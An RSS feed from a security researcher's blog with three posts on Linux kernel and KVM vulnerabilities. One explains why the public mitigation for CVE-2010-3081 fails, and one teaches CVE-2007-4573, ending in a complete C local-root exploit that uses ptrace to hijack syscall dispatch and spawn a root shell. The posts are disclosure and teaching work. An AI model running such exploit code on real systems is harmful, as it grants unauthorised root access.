<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Made of Bugs &#187; exploits</title>
	<atom:link href="http://blog.nelhage.com/tag/exploits/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.nelhage.com</link>
	<description>It's software. It's made of bugs.</description>
	<lastBuildDate>Thu, 18 Aug 2011 21:57:23 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>BlackHat/DEFCON 2011 talk: Breaking out of KVM</title>
		<link>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/</link>
		<comments>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/#comments</comments>
		<pubDate>Mon, 08 Aug 2011 17:32:29 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[Low-level hacking]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[DEFCON]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kvm]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=474</guid>
		<description><![CDATA[I&#8217;ve posted the final slides from my talk this year at DEFCON and Black Hat, on breaking out of the KVM Kernel Virtual Machine on Linux. Virtunoid: Breaking out of KVM [Edited 2011-08-11] The code is now available. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve posted <a href="http://nelhage.com/talks/kvm-defcon-2011.pdf">the final slides</a> from my talk this year at <a href="http://defcon.org/">DEFCON</a> and <a href="http://blackhat.com/">Black Hat</a>, on breaking out of the <a href="http://www.linux-kvm.org/page/Main_Page">KVM</a> Kernel Virtual Machine on Linux.</p>

<div style="width:425px; margin:auto; padding: 1em" id="__ss_8908773"><strong style="display:block;margin:12px 0 4px"><a href="http://www.slideshare.net/NelsonElhage/virtunoid-breaking-out-of-kvm" title="Virtunoid: Breaking out of KVM">Virtunoid: Breaking out of KVM</a></strong><object id="__sse8908773" width="425" height="355"><param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" /><param name="allowFullScreen" value="true"/><param name="allowScriptAccess" value="always"/><embed name="__sse8908773" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=kvm-defcon-2011-110818165327-phpapp02&#038;stripped_title=virtunoid-breaking-out-of-kvm&#038;userName=NelsonElhage" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"></embed></object></div>

<p><b>[Edited 2011-08-11]</b> The <a href="https://github.com/nelhage/virtunoid">code is now available</a>. It should be fairly well-commented, and include links to everything you&#8217;ll need to get the exploit up and running in a local test environment, if you&#8217;re so inclined.</p>

<p>In addition, as I mentioned, this bug was found by a simple KVM fuzzer I wrote. I&#8217;m also going to clean that up and release it, but don&#8217;t expect it too soon.</p>

<p>I had a great time meeting lots of interesting people at BlackHat and DEFCON, some that I&#8217;d met online and others I hadn&#8217;t. If any of you are ever in Boston, drop me a note and we can grab a beer or something.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2011/08/breaking-out-of-kvm/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Some notes on CVE-2010-3081 exploitability</title>
		<link>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/</link>
		<comments>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/#comments</comments>
		<pubDate>Tue, 30 Nov 2010 16:58:01 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[cve-2010-3081]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=401</guid>
		<description><![CDATA[Most of you reading this blog probably remember CVE-2010-3081. The bug got an awful lot of publicity when it was discovered an announced, due to allowing local privilege escalation against virtually all 64-bit Linux kernels in common use at the time. While investigating CVE-2010-3081, I discovered that several of the commonly-believed facts about the CVE [...]]]></description>
			<content:encoded><![CDATA[<p>Most of you reading this blog probably remember
<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081">CVE-2010-3081</a>. The bug got an awful lot of publicity when it
was discovered an announced, due to allowing local privilege
escalation against virtually all 64-bit Linux kernels in common use at
the time.</p>

<p>While investigating CVE-2010-3081, I discovered that several of the
commonly-believed facts about the CVE were wrong, and it was even more
broadly exploitable than was publically documented. I&#8217;d like to share
those observations here.</p>

<h2>A brief review of the bug</h2>

<p>The bug arose from the <code>compat_alloc_user_space</code> function in Linux&#8217;s
32-bit compatibility support on 64-bit
systems. <code>compat_alloc_user_space</code> allocates and returns space on the
userspace kernel stack for the kernel to use:</p>

<pre><code>static inline void __user *compat_alloc_user_space(long len)
{
    struct pt_regs *regs = task_pt_regs(current);
    return (void __user *)regs-&gt;sp - len;
}
</code></pre>

<p>This function is only called by compat-mode syscalls, so <code>current</code> is assumed to
be a 32-bit process, in which case <code>regs-&gt;sp</code>, the user stack pointer, will be a
32-bit quantity. This, if we subtract a small <code>len</code>, the result should still fit
in 32 bits, which, on a 64-bit system means it is guaranteed to fall within the
user address space.</p>

<p>Because of this, some callers of <code>compat_alloc_user_space</code> were lazy, and did
not call <code>access_ok</code> (or a function which called <code>access_ok</code>) to check that the
result of <code>compat_alloc_user_space</code> fell within the user address space.</p>

<p>However, it turned out that some call sites in the kernel called
<code>compat_alloc_user_space</code> with a user-controlled <code>len</code> value, allowing the
subtraction to wrap around. On a 64-bit system, the kernel lives in the top four
gigabytes of memory, and so this wraparound is enough for a user to cause
<code>compat_alloc_user_space</code> to return a pointer into the kernel&#8217;s address space.</p>

<p>Moreover, it turned out that the functions that used a user-controlled <code>len</code>
also did not check <code>access_ok</code> on the result of the allocation. In particular,
Linux 2.6.26 introduced the <code>compat_mc_getsockopt</code> function, which called
<code>compat_alloc_user_space</code> with a user-controlled length and then copied
user-controlled data to this pointer. It is this function which the public
exploit targetted.</p>

<h2>Disabling 32-bit binaries doesn&#8217;t help</h2>

<p>When an <a href="http://www.seclists.org/fulldisclosure/2010/Sep/268">exploit</a> was released for this bug, many sources
circulated a <a href="https://access.redhat.com/kb/docs/DOC-40265">mitigation</a>: Disable 32-bit binaries on a
system. Prevent compat-mode processes from running, the logic goes,
and you prevent anyone from making a compat-mode syscall that triggers
the vulnerable path.</p>

<p>This mitigation indeed prevented the public exploit from working (it
included 32-bit inline assembly, and so couldn&#8217;t even easily be
recompiled as a 64-bit binary), and many observers seemed to believe
it closed the bug entirely.</p>

<p>However, this was not the case! It turns out, on an <code>amd64</code> system, a
64-bit process can still make a compat-mode system call using the <code>int
$0x80</code> instruction, which is the traditional 32-bit syscall mechanism!
Even though the process is running in 64-bit mode, <code>int $0x80</code>
redirects to the compat-mode syscall table.</p>

<p>After realizing this, modifying the public exploit to work when
compiled in 64-bit mode was a simple matter of porting the inline
assembly, and changing a small handful of types. I&#8217;ve posted the
modified <a href="http://nelhage.com/files/abftw_64.c">exploit</a> and the <a href="http://nelhage.com/files/abftw.diff">diff</a> against the original
for the curious.</p>

<h2>The integer overflow is totally irrelevant</h2>

<p>Once you&#8217;ve realized that you can make compat-mode system calls from a 64-bit
process, a little bit of thought reveals something else
interesting. <code>compat_alloc_user_space</code> subtracts the <code>len</code> value off of the
userspace stack pointer. Previously, we relied on subtracting a large value from
a 32-bit stack pointer in order to end up with a kernel pointer. However, while
a 32-bit is limited to a 32-bit stack pointer, a 64-bit process can write a full
64-bit value into <code>%rsp</code>, and thus <code>regs-&gt;sp</code>! There&#8217;s no need for underflow at
all &#8212; you can just write a 64-bit value into <code>%rsp</code> and do an <code>int $0x80</code>, and
make <code>compat_alloc_user_space</code> return any value you please!</p>

<p>The condition for exploitability thus drops from &#8220;user-controlled
<code>len</code> and no <code>access_ok</code>&#8221; to simply &#8220;no <code>access_ok</code>&#8220;.</p>

<p>This is interesting, because it turns out that some very old kernels, before
2.6.11, including RHEL 4, have the following function:</p>

<pre><code>int siocdevprivate_ioctl(unsigned int fd, unsigned int cmd, unsigned long arg)
{
        struct ifreq __user *u_ifreq64;

        ...
        u_ifreq64 = compat_alloc_user_space(sizeof(*u_ifreq64));

        /* Don't check these user accesses, just let that get trapped
         * in the ioctl handler instead.
         */
        copy_to_user(&amp;u_ifreq64-&gt;ifr_ifrn.ifrn_name[0], &amp;tmp_buf[0], IFNAMSIZ);
        __put_user(data64, &amp;u_ifreq64-&gt;ifr_ifru.ifru_data);

        return sys_ioctl(fd, cmd, (unsigned long) u_ifreq64);
}
</code></pre>

<p>Remember, we can make <code>compat_alloc_user_space</code> return an arbitrary
value. The <code>copy_to_user</code> will call <code>access_ok</code> and fail, but that
return value will be discarded, and the <code>__put_user</code> will scribble 32
bits of user-controlled data at a user-controlled address. Bingo,
local root.</p>

<p>It turns out this function was present in Linux 2.4.x, too, meaning
that this exploit even affected RHEL3 and anyone else still running a
2.4-based system!</p>

<p>Based on this exploit, I&#8217;ve produced a working proof-of-concept
exploit for RHEL4, based on the released exploit for RHEL5. Contact me
if you&#8217;re interested, but it&#8217;s pretty straightforward.</p>

<h2>Closing notes</h2>

<p>As far as I know, neither of these facts has been publically
documented prior to this post. I shared this information with Red Hat,
and they requested I keep it private until they released fixes for
RHEL 3, which happened last week. I would not be at all surprised to
learn that someone else has private exploits that incorporate either
or both of these observations, though.</p>

<p>One important moral here is you must be <em>very careful</em> when declaring
a system unaffected by a vulnerability, or declaring a mitigation to
be complete. Software systems have gotten tremendously complex, and
it&#8217;s often impossible to be totally confident you understand every
last way an attacker could tickle a vulnerability.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/11/exploiting-cve-2010-3081/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in linus&#8217;s git repository) Note that this patch was applied to v2.6.22
&#8211; These files have moved around, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>IA32_LOAD_ARGS</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. In other words, for 32-bit processes
running on the 64-bit machine, or for 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>mov</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above becomes a problem.
Aas long as <code>%eax</code> is less than <code>(IA32_NR_syscalls-1)</code>, <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers for the system call procedes.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall</li>
<li>Have the process execute an <code>int $0x80</code></li>
<li>Have the parent modify <code>%rax</code> in the child to be 64 bits wide, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into call it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
        if((signed long)mmap((void*)(landing&amp;~0xFFF), 4096,
                              PROT_READ|PROT_EXEC|PROT_WRITE,
                              MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,
                                0, 0) &lt; 0) {
                perror("mmap");
                exit(-1);
        }
        *(long*)landing = set_user;
        /*
          We use mmap(2) to map a page at "landing", and write a
          pointer to the set_user function there.
         */

        pid_t child;
        child = fork();
        /*
          We fork two processes. The parent will ptrace the child, and
          the child will execute the `int 0x80` syscall.
         */
        if(child == 0) {
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                /*
                  We ask for someone to trace us, and then signal
                  ourselves, which causes us to wait for our parent to
                  attach via `ptrace`.
                 */
                __asm__("movl $0, %ebx\n\t"
                        "int $0x80\n");
                /*
                  We then make an (arbitrary) syscall via int 0x80,
                  with %ebx set to 0. Linux's system call convention
                  stores the first argument in %ebx, so if all goes
                  right, when our parent mucks with %rax, this will
                  result in the kernel calling set_user(0), setting
                  our current UID to 0.
                */

                execl("/bin/sh", "/bin/sh", NULL);
                /* Once we have root, we exec a shell. */
        } else {
                wait(NULL);
                ptrace(PTRACE_SYSCALL, child, NULL, NULL);
                wait(NULL);
                ptrace(PTRACE_POKEUSER, child, offsetof(struct user, regs.orig_rax),
                        (void*)offset);
                ptrace(PTRACE_DETACH, child, NULL, NULL);
                wait(NULL);
                /*
                  In the parent we need to do is `wait` for the child
                  to stop, allow it to advance until the next syscall,
                  use `PTRACE_POKEUSER` to poke `offset` into `%rax`,
                  and then detach and let it run.
                 */
        }
}
</code></pre>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

